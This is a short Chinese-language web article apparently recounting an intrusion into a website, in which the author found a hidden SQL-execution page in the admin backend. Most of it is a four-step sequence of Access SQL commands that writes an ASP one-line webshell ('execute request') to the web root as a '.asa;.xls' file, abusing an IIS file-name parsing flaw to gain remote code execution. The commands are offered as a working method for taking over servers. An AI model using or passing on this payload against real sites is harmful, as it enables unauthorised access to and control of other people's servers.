你的位置:聚盟网 >> 网络学院 >> 防护 >> 详细内容 在线投稿

ACCESS执行SQL命令导出一句话SHELL

www.juoooo.com  2011年10月22日19:43  来源: 互联网   查看:   我要评论(0)  收藏  字号: TTT
前几天整个站。好不容易进了后台,发现啥上传啊。备份啊多木有。
 
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
 
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
 
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
 
1.create table cmd (a varchar(50))
 
2.insert into cmd (a) values (‘<%execute request("tmdsb")%>‘)
 
3.select * into [a] in ‘C:\www.tmdsb.com\tmdsb.asa;.xls’ ‘excel 4.0;’ from cmd
(把表cmd的内容导出为物理路径的一个EXCEL文件)
 
4.drop table cmd
 
利用IIS的BUG成功拿到了WEBSHELL。

编辑: 伊小露
分享到:
顶:53 踩:65
【已经有427人表态】
73票
超赞
57票
震惊
48票
不解
51票
愤怒
42票
支持
57票
高兴
46票
无聊
53票
杯具
发表评论

网友评论仅供网友表达个人看法,并不表明本网同意其观点或证实其描述。

查看全部回复【已有0位网友发表了看法】
糗事吧 牛吧 私房话 经典吧
祝福墙许愿墙
随手记-天天记帐本
邀请达人
2013祝福短信,节日祝福语